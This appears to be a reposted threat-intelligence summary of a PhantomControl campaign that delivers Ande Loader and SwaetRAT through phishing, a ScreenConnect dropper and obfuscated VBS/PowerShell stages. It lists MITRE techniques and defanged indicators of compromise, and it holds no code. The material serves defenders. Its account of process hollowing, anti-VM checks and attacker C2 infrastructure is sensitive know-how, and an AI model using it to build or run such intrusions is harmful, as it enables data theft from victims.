Threat Research

PhantomControl returns with Ande Loader and SwaetRAT

Securonix

eSentire’s TRU team details a PhantomControl campaign that chains phishing, a compromised website delivering a ScreenConnect dropper, and multi-stage payloads culminating in SwaetRAT with persistence and data-exfiltration capabilities. The report highlights abuse of legitimate tools, heavy obfuscation, process hollowing, and diverse C2 channels (DNS and HTTP) used by the actors. #PhantomControl #SwaetRAT

Keypoints

  • eSentire’s Threat Response Unit observed a PhantomControl incident in November 2023 with high confidence that phishing was the initial infection vector.
  • A compromised website delivered a malicious ScreenConnect client, leading to a connection to the actors’ ScreenConnect instance at legal-advocate.screenconnect[.]com and IP 147.75.81[.]214.
  • Approximately 9 minutes after launching ScreenConnect, a file named File_Vbs.vbs (MD5: 91570b30470e0375c62972a268fcaee7) was dropped under DocumentsConnectWiseControlTemp.
  • The VBS script references paste[.]ee and, after cleanup, reveals a reversed base64-encoded PowerShell snippet that is decoded and executed.
  • Ande Loader, a .NET payload (MD5: 92fc4d4a1f6cad69ab11484e74815b50), is delivered from a base64 blob and is used to load a core RAT payload (SwaetRAT).
  • SwaetRAT is a 32-bit RAT with keylogging, system information collection, UAC checks, and a range of C2 commands, including remote screen capture and file operations.
  • The RAT uses process hollowing to inject into RegAsm.exe (T1055.012), employs startup persistence (T1547.001), and communicates via multiple channels (DNS and HTTP) to exfiltrate data and receive commands.

MITRE Techniques

  • [T1566.001] Phishing – Initial infection via phishing email. “In November 2023, eSentire’s Threat Response Unit observed an incident involving the PhantomControl threat actor(s). Based on the logs, we assess with high confidence that the initial infection vector was a phishing email.”
  • [T1189] Drive-by Compromise – Compromised website delivering a malicious ScreenConnect client. “The user was redirected to a malicious website serving ScreenConnect client from receipt-view.blogspot[.]com. Tracing the download source, we stumbled on a compromised website hosting a malicious ScreenConnect client.”
  • [T1219] Remote Access Tools – Use of ScreenConnect as a C2/RAS channel. “Upon running the ScreenConnect client, the infected machine established the connection to legal-advocate.screenconnect[.]com.”
  • [T1105] Ingress Tool Transfer – Downloading payload data from URLs. “The VBS script sets the URL of an image, creates a WebClient object, and downloads the data from the URL as a byte array.”
  • [T1071.001] Web Protocols – C2 communications over HTTP. “The VBS script sends an HTTP GET request to the URL, then it checks if the response status is 200.”
  • [T1027] Obfuscated/Compressed Files or Information – Obfuscated content in the VBS script and blob. “garbage strings that conceal the malicious code” and “garbled data and reversed strings.”
  • [T1059.005] VBScript – Execution of malicious code via VBScript. “The VBS script contains garbage strings that conceal the malicious code.”
  • [T1059.001] PowerShell – Deobfuscated PowerShell snippet loaded from base64 data. “reversed base64-encoded obfuscated PowerShell snippet”
  • [T1055.012] Process Hollowing – Core payload injected into RegAsm.exe. “the core payload gets injected into RegAsm.exe via process hollowing (T1055.012).”
  • [T1547.001] Startup Folders – Persistence via Startup shortcut. “creating a persistence via Startup (T1547.001) with the shortcut file named ‘LnkName’.”
  • [T1113] Screen Capture – Screenshot capture and exfiltration. “DeskDrop: Captures a screenshot and sends it back to the server in a base64-encoded and GZIP-compressed format.”
  • [T1082] System Information Discovery – Info method collects system information. “Info method collects system information” and lists components such as user name, OS, architecture, antivirus, UAC status, and group.
  • [T1497] Virtualization/Sandbox Evasion – Anti-VM checks. “The AntiVM feature would check for processes that contain “vmtoolsd” or “VBoxService.””
  • [T1071.004] DNS – C2 via DNS. “SwaetRAT C2: dns-govv[.]ink”

Indicators of Compromise

  • [Domain] receipt-view.blogspot[.]com – Redirector used to host initial malicious activity
  • [Domain] jewelrycleaningmachine[.]com – Compromised URL hosting the malicious content
  • [Domain] legal-advocate.screenconnect[.]com – Threat actor-controlled ScreenConnect instance
  • [IP Address] 147.75.81[.]214 – Resolve/host for the ScreenConnect instance
  • [MD5] 412e11d3ff7659c7d05194cc5e0e1f32 – ScreenConnect client binary
  • [MD5] 91570b30470e0375c62972a268fcaee7 – File_Vbs.vbs dropped on host
  • [MD5] 92fc4d4a1f6cad69ab11484e74815b50 – Ande Loader binary
  • [MD5] d6d29037517bb1d8202efbf39534df7a – SwaetRAT binary
  • [Domain] dns-govv[.]ink – SwaetRAT C2 domain
  • [URL] paste[.]ee/d/k7m1f/0 – Source of the base64 blob for the core payload
  • [URL] uploaddeimagens.com[.]br/images/004/666/676/original/vbs.jpg?1700182879 – Host for Ande Loader content
  • [Mutex] qVnqcuDNS5fGFGb – Mutex created to ensure single instance

Read more: https://www.esentire.com/blog/phantomcontrol-returns-with-ande-loader-and-swaetrat

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint